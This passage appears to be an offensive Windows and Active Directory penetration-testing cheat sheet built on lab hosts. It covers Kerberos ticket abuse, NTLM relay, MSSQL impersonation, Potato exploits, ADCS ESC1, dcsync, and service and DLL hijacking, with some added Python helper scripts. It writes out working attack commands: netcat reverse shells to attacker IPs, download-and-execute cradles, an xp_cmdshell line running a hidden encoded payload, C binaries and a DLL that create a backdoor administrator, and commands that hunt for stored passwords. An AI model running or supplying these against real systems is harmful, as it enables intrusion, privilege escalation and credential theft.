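def issue_ticket(service_key: bytes, sname: str, cname: str) -> Ticket:
    """KDC side: only client identity etc. go into the encrypted part."""
    return Ticket(sname, encrypt(service_key, f"cname={cname}".encode()))

def tgssub(ticket: Ticket, altservice: str) -> Ticket:
    """What Rubeus tgssub /altservice does: swap the service class, keep the
    host, leave enc-part byte-for-byte unchanged."""
    host = ticket.sname.split("/", 1)[1]
    return Ticket(f"{altservice}/{host}", ticket.enc_part)

def retarget(ticket: Ticket, new_sname: str) -> Ticket:
    """Attacker attempt to aim the ticket at a different host (expected to fail)."""
    return Ticket(new_sname, ticket.enc_part)

def service_accepts(ticket: Ticket, my_sname: str, my_key: bytes) -> Optional[str]:
    """Service side: the sname must be mine, then enc-part must verify and
    decrypt under my own key. Returns the authenticated client name or None."""
    if ticket.sname.lower() != my_sname.lower():
        return None
    try:
        part = decrypt(my_key, ticket.enc_part)
    except ValueError:
        return None
    return part.decode().split("=", 1)[1]

def demo() -> Dict[str, Optional[str]]:
    dc2_key = os.urandom(32)   # long-term key of dc-2$: HOST, CIFS, HTTP, LDAP ... all use it
    sql2_key = os.urandom(32)  # long-term key of sql-2$
    http_dc2 = issue_ticket(dc2_key, "http/dc-2.dev.cyberbotic.io", "nlamb")
    return {
        # same host, other service class: accepted, nlamb now has an SMB ticket
        "cifs_on_dc2": service_accepts(tgssub(http_dc2, "cifs"),
                                       "cifs/dc-2.dev.cyberbotic.io", dc2_key),
        # other host: sname matches, but the tag check under sql-2$'s key fails
        "cifs_on_sql2": service_accepts(retarget(http_dc2, "cifs/sql-2.dev.cyberbotic.io"),
                                        "cifs/sql-2.dev.cyberbotic.io", sql2_key),
    }

if __name__ == "__main__":
    print(demo())
```

The model also shows the limit of the trick: a ticket for a user-account SPN (for example an MSSQL service running as a dedicated service account) cannot be rewritten to cifs on the same box, because the machine account's key is a different one.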
  • One machine's computer account is a local administrator on another machine: coerce the first to authenticate to you (printer bug) and relay that NTLM authentication to the second.

Confirm the spooler is reachable on the coercible host:

gwmi win32_printer -computer $admin_ip
get-printerport -computername $admin_ip

The relay only works if the target does not require SMB signing (look for "Message signing enabled but not required"):

nmap --script=smb2-security-mode $admin_ip $target_ip

python ntlmrelayx.py -smb2support -t smb://$target_ip -debug
python ntlmrelayx.py -smb2support -t smb://$target_ip -debug -c "whoami /all"

Trigger the spooler on $admin_ip to connect back to the relay host:

spoolsample.exe $admin_ip $mitm_ip

https://github.com/leechristensen/SpoolSample

Registry

reg query hklm /f password /t reg_sz /s
reg query hkcu /f password /t reg_sz /s

Paths

  • PowerShell history: c:\users\$user\appdata\roaming\microsoft\windows\powershell\psreadline\ConsoleHost_history.txt
  • Redis conf: c:\program files\redis\redis.windows.conf
  • MSSQL conf: c:\program files\microsoft sql server\
  • mRemoteNG (saved connections with encrypted passwords): c:\users\$user\appdata\roaming\mremoteng\confcons.xml
  • WEB & SMB & FTP service roots and configuration files
  • Firefox profiles (saved logins): c:\users\$user\appdata\roaming\mozilla
  • McAfee agent database (encrypted deployment credentials): c:\programdata\mcafee\agent\db\ma.db
  • AppLocker: c:\windows\system32\spool\drivers\color\ (user-writable but covered by the default C:\Windows\* allow rule, so a usual place to drop and run binaries)

File transfer

  • Server
    • smb
    python smbserver.py Bufferfly . -smb2support -username Buffer -password fly &
    • http
    python -m http.server 80 &
  • Client
    • curl
    • wget
    • iex(new-object net.webclient).downloadstring("http://10.10.*.*/PowerView.ps1")
    • $WebClient = New-Object System.Net.WebClient; $WebClient.DownloadFile("http://10.4.23.166/JuicyPotato.exe", "C:\users\bruce\desktop\juicy.exe")
    • iwr -uri http://192.168.45.187/winPEASany.exe -outfile winPEASany.exe
    • certutil -urlcache -split -f http://10.50.98.5:8888/bfl.exe
    • smb (authenticate to the share, copy in either direction, then drop the mapping)
      net use \\10.10.*.*\Bufferfly /u:Buffer fly
      copy test \\10.10.*.*\Bufferfly
      net use /d \\10.10.*.*\Bufferfly

Port forwarding

Listen on 2222 on the pivot and forward to 10.4.204.215:22. portproxy needs administrator rights and the IP Helper service running; the firewall rule lets the listener be reached:

netsh interface portproxy add v4tov4 listenport=2222 listenaddress=0.0.0.0 connectport=22 connectaddress=10.4.204.215
netsh advfirewall firewall add rule name="port_forward_2222" protocol=TCP dir=in localip=0.0.0.0 localport=2222 action=allow

Privilege escalation

S4U2Self Abuse

Normally used with a machine account's TGT: S4U2Self lets any account obtain a service ticket to itself for an arbitrary user, with no delegation configuration required, and /altservice rewrites the sname. The ticket is therefore only valid for services on that same machine.

.\Rubeus.exe s4u /impersonate:nlamb /self /altservice:cifs/dc-2.dev.cyberbotic.io /user:dc-2$ /nowrap /ticket:$ticket

Pass The Ticket

Create a sacrificial logon session so the injected ticket does not overwrite the tickets of the current session, then inject into it by LUID:

.\Rubeus.exe createnetonly /program:c:\windows\system32\cmd.exe /domain:dev.cyberbotic.io /username:bfarmer /password:fake
.\Rubeus.exe ptt /luid:0x14b3e9 /ticket:$ticket

Token Impersonation

Cobalt Strike

steal_token PID
rev2self

EXP

runascs

https://github.com/antonioCoco/RunasCs/

runascs c.bum Tikkycoll_431012284 powershell -r 10.10.*.*:9998

Overpass The Hash

sekurlsa::pth /domain:$domain /user:$username /ntlm:$ntlm /run:powershell

Requesting the TGT with the AES256 key and /opsec avoids the RC4 downgrade that a plain NTLM hash causes (encryption type 0x17 in 4768 events):

.\Rubeus.exe asktgt /user:jking /aes256:$AES_HASH /domain:dev.cyberbotic.io /opsec /nowrap

MSSQL Impersonate

Find IMPERSONATE grants on server logins (grantee_principal_id is who may impersonate, major_id is the login being impersonated):

.\Sqlrecon.exe /a:wintoken /h:sql-2.dev.cyberbotic.io /m:query /c:"select * from sys.server_permissions where permission_name='IMPERSONATE'"

class | class_desc | major_id | minor_id | grantee_principal_id | grantor_principal_id | type | permission_name | state | state_desc |
---------------------------------------------------------------------------------------------------------------------------------------
101 | SERVER_PRINCIPAL | 267 | 0 | 268 | 267 | IM | IMPERSONATE | G | GRANT |

Resolve the two principal IDs:

.\Sqlrecon.exe /a:wintoken /h:sql-2.dev.cyberbotic.io /m:query /c:"select * from sys.server_principals where principal_id=267 or principal_id=268"

name | principal_id | sid | type | type_desc | is_disabled | create_date | modify_date | default_database_name | default_language_name | credential_id | owning_principal_id | is_fixed_role |
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
DEV\mssql_svc | 267 | System.Byte[] | U | WINDOWS_LOGIN | False | 1/20/2023 4:30:36 PM | 1/20/2023 4:30:36 PM | master | us_english | | | False |
DEV\Domain Users | 268 | System.Byte[] | G | WINDOWS_GROUP | False | 1/20/2023 4:32:54 PM | 1/20/2023 4:32:54 PM | master | us_english | | | False |

So every member of DEV\Domain Users (268) may impersonate DEV\mssql_svc (267). Our current login is not sysadmin:

.\Sqlrecon.exe /a:wintoken /h:sql-2.dev.cyberbotic.io /m:query /c:"select system_user, is_srvrolemember('sysadmin');"

column0 | column1 |
--------------------
DEV\bfarmer | 0 |

After EXECUTE AS LOGIN the session runs as mssql_svc, which is sysadmin:

.\Sqlrecon.exe /a:wintoken /h:sql-2.dev.cyberbotic.io /m:query /c:"execute as login = 'dev\mssql_svc'; select system_user, is_srvrolemember('sysadmin');"

column0 | column1 |
--------------------
DEV\mssql_svc | 1 |

With sysadmin, hop through a linked server and run xp_cmdshell on sql-1. This requires RPC Out to be enabled on the link and xp_cmdshell to be enabled on sql-1; the command runs with whatever login the link is configured to use:

.\Sqlrecon.exe /a:wintoken /h:sql-2.dev.cyberbotic.io /m:query /c:"exec('xp_cmdshell ''powershell -w hidden -enc $payload''') at [sql-1.cyberbotic.io]"
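The same reasoning done over the catalog rows, as an added Python example that is not part of the original notes or of SQLRecon: the permission and principal rows above are reproduced as constructed data, together with a constructed sys.server_role_members table (which records who holds sysadmin) and a constructed DENY row, and the code lists the effective IMPERSONATE edges, picks the ones that lead to sysadmin for the groups your login belongs to, and builds the EXECUTE AS statement.

```python
from typing import Dict, List, Tuple

# Constructed sample rows shaped like the SQLRecon output above.
# sys.server_principals: principal_id -> (name, type_desc)
SERVER_PRINCIPALS: Dict[int, Tuple[str, str]] = {
    1:   ("sa",                "SQL_LOGIN"),
    3:   ("sysadmin",          "SERVER_ROLE"),
    267: ("DEV\\mssql_svc",    "WINDOWS_LOGIN"),
    268: ("DEV\\Domain Users", "WINDOWS_GROUP"),
    269: ("DEV\\bfarmer",      "WINDOWS_LOGIN"),
}
# sys.server_permissions: (class_desc, major_id = login being impersonated,
#                          grantee_principal_id, permission_name, state)
SERVER_PERMISSIONS = [
    ("SERVER_PRINCIPAL", 267, 268, "IMPERSONATE", "G"),   # the row from the page
    ("SERVER_PRINCIPAL", 1,   269, "IMPERSONATE", "D"),   # constructed DENY: must be ignored
]
# sys.server_role_members: (role_principal_id, member_principal_id)
SERVER_ROLE_MEMBERS = [(3, 1), (3, 267)]

def _name(pid: int) -> str:
    return SERVER_PRINCIPALS.get(pid, (f"<principal {pid}>", "?"))[0]

def role_id(role_name: str) -> int:
    for pid, (name, kind) in SERVER_PRINCIPALS.items():
        if kind == "SERVER_ROLE" and name.lower() == role_name.lower():
            return pid
    raise KeyError(role_name)

def _effective_impersonate():
    # state 'G' = GRANT, 'W' = GRANT WITH GRANT OPTION, 'D' = DENY (no effect for us)
    for cls, major, grantee, perm, state in SERVER_PERMISSIONS:
        if cls == "SERVER_PRINCIPAL" and perm == "IMPERSONATE" and state in ("G", "W"):
            yield grantee, major

def impersonation_edges() -> List[Tuple[str, str]]:
    """(grantee, login it may EXECUTE AS) for every effective IMPERSONATE grant."""
    return [(_name(grantee), _name(major)) for grantee, major in _effective_impersonate()]

def is_sysadmin(pid: int) -> bool:
    sa = role_id("sysadmin")
    return any(role == sa and member == pid for role, member in SERVER_ROLE_MEMBERS)

def escalation_targets(my_principal_ids: List[int]) -> List[str]:
    """Logins that the current session (its own login plus the Windows groups it
    maps to) may impersonate and that hold sysadmin: direct escalation paths."""
    mine = set(my_principal_ids)
    return sorted({_name(major) for grantee, major in _effective_impersonate()
                   if grantee in mine and is_sysadmin(major)})

def execute_as_query(login: str, inner_sql: str) -> str:
    """T-SQL that switches to the impersonated login, runs inner_sql, then REVERTs
    so the session is left as it was found."""
    safe = login.replace("'", "''")
    return f"EXECUTE AS LOGIN = '{safe}'; {inner_sql}; REVERT;"

if __name__ == "__main__":
    # bfarmer (269) is a member of Domain Users (268)
    for target in escalation_targets([269, 268]):
        print(execute_as_query(target, "SELECT SYSTEM_USER, IS_SRVROLEMEMBER('sysadmin')"))
```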

PrintNightmare

https://github.com/calebstewart/CVE-2021-1675
https://github.com/m8sec/CVE-2021-34527

AlwaysInstallElevated

When AlwaysInstallElevated is set to 1 in both the HKLM and the HKCU policy key, every .msi installed by any user runs with SYSTEM privileges, so a malicious MSI (installed with msiexec /quiet /qn /i) is enough to escalate. Both keys must be 1; if either is missing or 0 the policy is not in effect.
https://zhuanlan.zhihu.com/p/375373404

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

SeImpersonatePrivilege/SeCreateGlobalPrivilege

https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe

For newer Windows builds (Windows 10 1809 / Server 2019 and later), where the original JuicyPotato no longer works:
https://github.com/antonioCoco/JuicyPotatoNG/releases/download/v1.1/JuicyPotatoNG.zip

Needs only SeImpersonatePrivilege and was not flagged by Windows Defender when these notes were written:
https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe

whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name          Description                               State
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking                  Enabled
SeImpersonatePrivilege  Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects                     Enabled

  • With SeImpersonatePrivilege, run JuicyPotato with -t t (CreateProcessWithTokenW)
  • With SeAssignPrimaryTokenPrivilege, run it with -t u (CreateProcessAsUser)
  • -t * tries both
  • If neither privilege is held, this family of exploits cannot escalate

https://blog.csdn.net/god_zzZ/article/details/106334702

JuicyPotato.exe -t t -p "./nc.exe" -a "-e c:\windows\system32\cmd.exe 10.10.*.* 9995" -l 6666 -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}

JuicyPotatoNG.exe -t t -p "./nc.exe" -a "-e c:\windows\system32\cmd.exe 10.10.*.* 9995"
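An added Python example, not from the original notes, that parses whoami /priv output and derives the JuicyPotato -t value from it. The sample output is constructed from the listing above plus one Disabled privilege, to show that a privilege reported as Disabled is still held by the token (the process can enable it itself with AdjustTokenPrivileges), so presence rather than State is what decides.

```python
from typing import Dict, Optional

# Constructed whoami /priv output in the page's format, extended with one
# Disabled privilege. Note the description column contains spaces.
WHOAMI_PRIV_SAMPLE = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
"""

def parse_whoami_priv(text: str) -> Dict[str, str]:
    """Map privilege name -> State. Data rows start after the '====' separator;
    the first whitespace-delimited field is the name, the last is the state."""
    privs: Dict[str, str] = {}
    in_table = False
    for line in text.splitlines():
        if line.startswith("="):
            in_table = True
            continue
        if not in_table or not line.strip():
            continue
        fields = line.split()
        privs[fields[0]] = fields[-1]
    return privs

def potato_token_mode(privs: Dict[str, str]) -> Optional[str]:
    """JuicyPotato -t value for this token:
    't' -> CreateProcessWithTokenW, needs SeImpersonatePrivilege
    'u' -> CreateProcessAsUser, needs SeAssignPrimaryTokenPrivilege
    '*' -> both held, let the tool try both
    None -> neither held; Potato-style exploits will not work here."""
    has_t = "SeImpersonatePrivilege" in privs
    has_u = "SeAssignPrimaryTokenPrivilege" in privs
    if has_t and has_u:
        return "*"
    if has_t:
        return "t"
    if has_u:
        return "u"
    return None

if __name__ == "__main__":
    privs = parse_whoami_priv(WHOAMI_PRIV_SAMPLE)
    print(sorted(privs), potato_token_mode(privs))
```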

CLSID

https://github.com/ohpe/juicy-potato/tree/master/CLSID

Meterpreter

load incognito
list_tokens -g
impersonate_token "BUILTIN\Administrators"

ps | grep services.exe
Filtering on 'services.exe'

Process List
============

 PID  PPID  Name          Arch  Session  User                 Path
 ---  ----  ----          ----  -------  ----                 ----
 668  580   services.exe  x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\services.exe

migrate 668

ADCS

ESC1: a regular domain user becomes domain administrator by abusing an over-permissioned Active Directory Certificate Services (ADCS) certificate template.
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-misconfigured-certificate-template-to-domain-admin

A template is vulnerable to ESC1 when all of the following hold:

  • msPKI-Certificate-Name-Flag: ENROLLEE_SUPPLIES_SUBJECT # the requester chooses the subject / SAN, so any account can be named
  • pkiextendedkeyusage: Client Authentication # the certificate can be used to authenticate to AD (PKINIT)
  • Enrollment Rights: Domain Users # low-privileged users may enroll
  • No manager approval and no authorized signatures required

Check for misconfigured templates:

.\Certify.exe find /vulnerable
CA Name                               : dc-2.dev.cyberbotic.io\sub-ca
Template Name                         : CustomUser
Schema Version                        : 2
Validity Period                       : 1 year
Renewal Period                        : 6 weeks
msPKI-Certificate-Name-Flag           : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required        : 0
pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy  : Client Authentication, Encrypting File System, Secure Email
Permissions
  Enrollment Permissions
    Enrollment Rights           : CYBER\Domain Admins          S-1-5-21-2594061375-675613155-814674916-512
                                  CYBER\Domain Users           S-1-5-21-2594061375-675613155-814674916-513
                                  CYBER\Enterprise Admins      S-1-5-21-2594061375-675613155-814674916-519
                                  DEV\Domain Users             S-1-5-21-569305411-121244042-2357301523-513
  Object Control Permissions
    Owner                       : CYBER\Administrator          S-1-5-21-2594061375-675613155-814674916-500
    WriteOwner Principals       : CYBER\Administrator          S-1-5-21-2594061375-675613155-814674916-500
                                  CYBER\Domain Admins          S-1-5-21-2594061375-675613155-814674916-512
                                  CYBER\Enterprise Admins      S-1-5-21-2594061375-675613155-814674916-519
    WriteDacl Principals        : CYBER\Administrator          S-1-5-21-2594061375-675613155-814674916-500
                                  CYBER\Domain Admins          S-1-5-21-2594061375-675613155-814674916-512
                                  CYBER\Enterprise Admins      S-1-5-21-2594061375-675613155-814674916-519
    WriteProperty Principals    : CYBER\Administrator          S-1-5-21-2594061375-675613155-814674916-500
                                  CYBER\Domain Admins          S-1-5-21-2594061375-675613155-814674916-512
                                  CYBER\Enterprise Admins      S-1-5-21-2594061375-675613155-814674916-519

DEV\Domain Users can enroll, the requester supplies the subject, no signatures or approval are required, and the certificate is valid for client authentication: ESC1.
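To turn those conditions into a check, here is an added Python parser for the Certify find output, not from the original notes or from Certify itself; it reads the template block printed above (re-indented as Certify prints it, with the object-control lines shortened) and applies the ESC1 conditions. Which principals count as "anyone can enroll" (Domain Users, Domain Computers, Authenticated Users, Everyone) and which EKUs count as usable for logon are my assumptions, encoded as constants.

```python
import re
from typing import Any, Dict, List, Tuple

# Certify.exe find /vulnerable output for the CustomUser template on this page,
# used as constructed sample input (object-control lines trimmed).
CERTIFY_SAMPLE = r"""
CA Name                               : dc-2.dev.cyberbotic.io\sub-ca
Template Name                         : CustomUser
Schema Version                        : 2
Validity Period                       : 1 year
Renewal Period                        : 6 weeks
msPKI-Certificate-Name-Flag           : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required        : 0
pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy  : Client Authentication, Encrypting File System, Secure Email
Permissions
  Enrollment Permissions
    Enrollment Rights           : CYBER\Domain Admins          S-1-5-21-2594061375-675613155-814674916-512
                                  CYBER\Domain Users           S-1-5-21-2594061375-675613155-814674916-513
                                  CYBER\Enterprise Admins      S-1-5-21-2594061375-675613155-814674916-519
                                  DEV\Domain Users             S-1-5-21-569305411-121244042-2357301523-513
  Object Control Permissions
    Owner                       : CYBER\Administrator          S-1-5-21-2594061375-675613155-814674916-500
    WriteOwner Principals       : CYBER\Administrator          S-1-5-21-2594061375-675613155-814674916-500
                                  CYBER\Domain Admins          S-1-5-21-2594061375-675613155-814674916-512
"""

SID_RE = re.compile(r"(S-1-(?:\d+-)*\d+)\s*$")
KV_RE = re.compile(r"^\s*([^:]+?)\s*:\s*(.*?)\s*$")

# Assumptions: EKUs that let a certificate authenticate to AD, and principals
# that mean "any low-privileged account may enroll".
AUTH_EKUS = {"client authentication", "pkinit client authentication",
             "smart card logon", "any purpose"}
LOW_PRIV_RIDS = {"513", "515"}           # Domain Users, Domain Computers
LOW_PRIV_SIDS = {"S-1-5-11", "S-1-1-0"}  # Authenticated Users, Everyone

def split_principal(value: str) -> Tuple[str, str]:
    sid = SID_RE.search(value).group(1)
    return value[: value.rfind(sid)].strip(), sid

def parse_template(text: str) -> Dict[str, Any]:
    """Lower-cased key -> string, or list of (name, sid) for principal lists.
    Continuation lines (a principal and SID, no colon) extend the last list."""
    fields: Dict[str, Any] = {}
    current_list = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = KV_RE.match(line)
        if m:
            key, value = m.group(1).lower(), m.group(2)
            if SID_RE.search(value):
                current_list = key
                fields[key] = [split_principal(value)]
            else:
                current_list = None
                fields[key] = value
        elif current_list and SID_RE.search(line):
            fields[current_list].append(split_principal(line))
        else:
            current_list = None   # section header such as "Permissions"
    return fields

def low_priv_enrollers(fields: Dict[str, Any]) -> List[str]:
    return [name for name, sid in fields.get("enrollment rights", [])
            if sid in LOW_PRIV_SIDS or sid.rsplit("-", 1)[-1] in LOW_PRIV_RIDS]

def esc1_checks(fields: Dict[str, Any]) -> Dict[str, bool]:
    ekus = {e.strip().lower() for e in str(fields.get("pkiextendedkeyusage", "")).split(",") if e.strip()}
    return {
        "enrollee_supplies_subject": "ENROLLEE_SUPPLIES_SUBJECT" in str(fields.get("mspki-certificate-name-flag", "")),
        "auth_eku": not ekus or bool(AUTH_EKUS & ekus),   # empty EKU = any purpose
        "no_manager_approval": "PEND_ALL_REQUESTS" not in str(fields.get("mspki-enrollment-flag", "")),
        "no_authorized_signatures": str(fields.get("authorized signatures required", "")).strip() == "0",
        "low_priv_enrollment": bool(low_priv_enrollers(fields)),
    }

def is_esc1(fields: Dict[str, Any]) -> bool:
    return all(esc1_checks(fields).values())

if __name__ == "__main__":
    f = parse_template(CERTIFY_SAMPLE)
    print(f["template name"], esc1_checks(f), low_priv_enrollers(f))
```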

Request a certificate with the domain admin nlamb as the alternative name:

.\Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:CustomUser /altname:nlamb

Save the private key and certificate that Certify prints as cert.pem, then convert to PFX (the export password is the one Rubeus later needs in /password):

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password: 123
Verifying - Enter Export Password: 123

Base64-encode it for Rubeus:

cat cert.pfx | base64 -w 0

Use the certificate to obtain a TGT as the domain admin (PKINIT):

.\Rubeus.exe asktgt /user:nlamb /password:123 /certificate:$certificate

Other tools

pip install certipy-ad
certipy find -vulnerable -stdout -u ryan.cooper@sequel.htb -p NuclearMosquito3 -dc-ip 10.10.11.202
certipy req -u ryan.cooper@sequel.htb -p NuclearMosquito3 -target dc.sequel.htb -template UserAuthentication -ca sequel-DC-CA -upn administrator@sequel.htb
certipy auth -pfx administrator.pfx -dc-ip 10.10.11.202

dcsync

"With both GetChanges and GetChangesAll privileges in BloodHound, you may perform a dcsync attack to get the password hash of an arbitrary principal using mimikatz"
https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html#getchanges-getchangesall

mimikatz's lsadump::dcsync does not read ntds.dit from disk: it impersonates a domain controller and pulls account secrets over the directory replication protocol (DRSUAPI GetNCChanges). That is why only the two replication rights above are needed and why it works from any host that can reach the DC.
《内网安全攻防》 P.296

python secretsdump.py -dc-ip 10.10.10.30 megacorp.local/svc_bes:Sheffield19@10.10.10.30

Services

Service binaries

List running services with their binary paths, then look for one whose executable (or its directory) you can overwrite:

Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

Replacement binary: creates a local administrator when the service starts (it runs as the service account, usually SYSTEM):

#include <stdlib.h>

int main(void)
{
    /* Executed with the service account's privileges when the service restarts. */
    system("net user bfl bfl123456. /add");
    system("net localgroup administrators bfl /add");
    return 0;
}

x86_64-w64-mingw32-gcc bfl.c -o bfl.exe

Restart-Service ServiceName

DLL hijacking

Use Process Monitor to find a DLL that a privileged process tries to load from a directory you can write to (CreateFile results of NAME NOT FOUND):
https://learn.microsoft.com/en-us/sysinternals/downloads/procmon

#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(HINSTANCE hinstDLL,          /* handle to this DLL module */
                      DWORD     ul_reason_for_call, /* reason for calling */
                      LPVOID    lpReserved)         /* reserved */
{
    (void)hinstDLL;
    (void)lpReserved;
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:   /* a process is loading the DLL: run the payload once */
        system("net user bfl bfl123456. /add");
        system("net localgroup administrators bfl /add");
        break;
    case DLL_THREAD_ATTACH:    /* a process is creating a new thread */
    case DLL_THREAD_DETACH:    /* a thread exits normally */
    case DLL_PROCESS_DETACH:   /* a process unloads the DLL */
        break;
    }
    return TRUE;
}

x86_64-w64-mingw32-gcc bfl.cpp -shared -o bfl.dll

Restart-Service ServiceName

Unquoted Service Paths

If a service's ImagePath is unquoted and contains spaces:

C:\Program Files\Buffer Fly\Bufferfly.exe

=>

Windows tries each space-delimited prefix as an executable, in order:

C:\Program.exe
C:\Program Files\Buffer.exe
C:\Program Files\Buffer Fly\Bufferfly.exe

Planting a binary at one of the earlier candidates (which needs write access to C:\ or to C:\Program Files\) hijacks the service the next time it starts. Find candidates with:

Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
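The candidate list above generalised, as an added Python example that is not part of the original notes: it takes (Name, PathName) pairs in the shape of the Get-CimInstance output, skips quoted paths and paths without spaces, strips trailing arguments, and returns the executables Windows would try plus the directories you would need write access to. The service rows are constructed sample data.

```python
import re
from typing import Dict, List

# Constructed sample shaped like Get-CimInstance win32_service | Select Name,PathName
SERVICES = [
    ("Bufferfly",   r"C:\Program Files\Buffer Fly\Bufferfly.exe"),
    ("VendorAgent", r"C:\Program Files\Vendor App\agent.exe -k netsvcs"),
    ("Quoted",      r'"C:\Program Files\Vendor App\app.exe" -k'),
    ("Spooler",     r"C:\Windows\System32\spoolsv.exe"),
]

# Everything up to the first ".exe" is the image path; anything after a space is arguments.
EXE_RE = re.compile(r"^(.*?\.exe)(?:\s.*)?$", re.IGNORECASE)

def unquoted_path_candidates(pathname: str) -> List[str]:
    """Executables the service controller would try, in order, for an unquoted
    ImagePath with spaces (each space-delimited prefix with .exe appended, then
    the real path). Empty list when the path is quoted, has no space before the
    .exe, or does not name an .exe at all."""
    p = pathname.strip()
    if p.startswith('"'):
        return []
    m = EXE_RE.match(p)
    if not m:
        return []
    words = m.group(1).split(" ")
    if len(words) < 2:
        return []
    out = []
    for i in range(1, len(words) + 1):
        prefix = " ".join(words[:i])
        out.append(prefix if i == len(words) else prefix + ".exe")
    return out

def dirs_needing_write_access(candidates: List[str]) -> List[str]:
    """Directories where one of the earlier candidates would have to be planted;
    check each with icacls or Get-Acl for write/create rights."""
    dirs = set()
    for c in candidates[:-1]:
        d = c.rsplit("\\", 1)[0]
        dirs.add(d + "\\" if d.endswith(":") else d)
    return sorted(dirs)

def find_unquoted_services(rows) -> Dict[str, List[str]]:
    """Service name -> candidate list, for every service affected."""
    found: Dict[str, List[str]] = {}
    for name, path in rows:
        cands = unquoted_path_candidates(path)
        if cands:
            found[name] = cands
    return found

if __name__ == "__main__":
    for name, cands in find_unquoted_services(SERVICES).items():
        print(name, cands, dirs_needing_write_access(cands))
```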

Scheduled tasks

schtasks /query /fo LIST /v